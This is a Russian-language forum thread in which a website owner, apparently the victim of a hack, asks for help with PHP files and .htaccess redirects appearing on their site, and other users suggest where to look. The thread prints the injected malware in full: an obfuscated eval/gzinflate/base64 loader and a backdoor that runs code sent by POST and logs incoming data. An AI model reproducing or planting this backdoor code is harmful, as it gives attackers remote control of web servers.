Привет народ, снедавних пор на моем сайте стали проиходить чудеса. Появляется скрипт с содержанием: PHP: <?php eval(gzinflate(base64_decode("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"))); ?> Так вот я вроде всё делал как на любимом форуме написано, все данные внешние перед запросом обрабатывал функцией mysql_real_escape_string, где переменная цифровая проверял цифровая ли она и тп, а получается есть sqlinj. Друзья, как быть? То просто фаил появлялся, а теперь htaccess ставится редирект на какойто ГС...
Может проблема не в Вас в соседе который тоже находится на этом сервере? Обратитесь с проблемой к хостингу провайдеру. Пусть они проверят логи, откуда, что и куда...
cat1vo, Да вот дело в том что логи предоставляются, а в них грамота филькина. Вроде как во мне причина... Cennarios, есть замечательный русские поговорки про радость чужим неудачам...
ТС, убирай этот код, закрывай дыры, ищи среди файлов шеллы, а также минишеллы записанные среди кода твоих основных файлов, прост посмотри какие в последнийраз менялись и быстро найдёшь
qaz, так могли дату обновления подменить) Минишел - это запрос к текстовому фаилу с последущей генерацией на сервере шела?) cLauZ, интернет-магазин йож, так содержание фаила выложено. Предоставили мне логи, а там жесть какаято. Щас буду учиться читать логи. Но как я понимаю фаила с дырой мне не скажут логи?)
вот если надо, чё там внутри... PHP: <?php @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit; ?>
могу ли я запись: Tue Nov 06 18:36:02 2012 0 ::ffff:65.254.224.34 3040 /home/users1/a/user_name/default.php b _ i r юзер ftp 0 * c интерпретировать, как косяк со стороны хостинга?! Получается что фаил был внезапно скачан в корневую директорию ftp, а не в один из сайтов на ftp, за которые спрос был бы с меня?
не мели чепуху да и вобще, те логи толку тебе особого не дадут, делай как я сказал или будешь до конца своих дней там парится
qaz, шеллом я менял дату изменения фаила... Совет то не плохой, осталось лишь решить, с чего начать. Залиться могли только при наличии sql-inj? Или могут быть и другие дыры в пхп скрипте? Подумал, а если из переменной которую подставляю в запрос вырезать кавычки, поможет?)
